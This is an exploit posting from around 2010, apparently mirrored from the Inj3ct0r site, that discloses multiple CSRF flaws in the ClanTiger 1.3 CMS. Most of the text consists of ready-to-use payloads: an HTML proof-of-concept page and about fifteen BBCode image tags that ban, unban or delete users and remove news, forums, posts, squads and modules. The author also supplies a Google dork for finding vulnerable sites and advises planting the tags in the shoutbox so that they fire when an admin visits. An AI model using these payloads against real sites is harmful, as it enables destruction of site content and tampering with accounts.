ClanTiger Multiple CSRF Vulnerabilities
Posted on 11 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ClanTiger Multiple CSRF Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================= ClanTiger Multiple CSRF Vulnerabilities ======================================= # Exploit Title: ClanTiger 1.3 Multiple CSRF, delete user, shoutbox items, news, ??? ban/unban user, delete forum etc. # Date: 11 July 2010 # Author: pimpim - pyscripter94@gmail.com # Software Link: www.clantiger.com, http://www.clantiger.com/files/clantiger/1.1.3/clantiger1.1.3.zip # Version: 1.3 # Google dork : [intext:"Powered by the Clan CMS ClanTiger"] # Platform / Tested on: ClanTiger 1.3 # Category: webapps/0day # Code : <html> ??? <head><title>ClanTiger CSRF</title></head> ??? <body> ??? ??? Admin ban ??? ??? <img src="http://site.com/clantiger/clantiger/index.php?module=profiles&action=setBan&id=1"></img> ??? </body> </html> Some Clantiger CSRF vulnerabilites Theese are some CSRF vulnerabilites I've found in the ClanTiger CMS. Easiest way to exploit theese are to post them in the shoutbox, and when a user with admin rights visits almost any page on the site, a user is deleted or a news item is removed or what ever you want. *Remove news Cross Site* CSRF: [img]http://site.com/clantiger/clantiger/index.php?module=news&action=remove&id=2[/img] *Remove shoutbox items* CSRF: [img]http://site.com/clantiger/clantiger/index.php?module=shoutbox&action=remove&id=2[/img] *Ban user Cross Site* [img]http://site.com/clantiger/clantiger/index.php?module=profiles&action=setBan&id=44[/img] *Activate/Unban user* [img]http://site.com/clantiger/clantiger/index.php?module=profiles&action=setActive&id=44[/img] *Delete user* [img]http://site.com/clantiger/clantiger/index.php?module=profiles&action=remove&id=44[/img] *Delete custom page* [img]http://site.comclantiger/clantiger/index.php?module=custompages&action=remove&id=1[/img] *Log out* [img]http://site.com/clantiger/index.php?module=login&action=deauthenticate[/img] *Delete Match* [img]http://site.com/clantiger/clantiger/index.php?module=matches&action=remove&id=5[/img] *Delete squad* [img]http://site.com/clantiger/clantiger/index.php?module=squads&action=remove&id=1[/img] *Delete Sponsor* [img]http://site.com/clantiger/clantiger/index.php?module=sponsors&action=remove&id=644[/img] *Delete forum* [img]http://site.com/clantiger/clantiger/index.php?module=forum&action=removeForum&id=1[/img] *Delete post* [img]http://site.com/clantiger/index.php?module=posts&type=reply&action=delete&id=12&pid=4[/img] id = thread id pid = post id *Delete widget* [img]http://site.com/clantiger/clantiger/index.php?module=widgets&action=deactivate&id=1[/img] *Delete smilies* [img]http://site.com/clantiger/clantiger/index.php?module=settings&action=removeSmilie&id=1[/img] *Deactivate module* [img]http://site.com/clantiger/clantiger/index.php?module=modules&action=deactivate&id=18[/img] # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-11]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
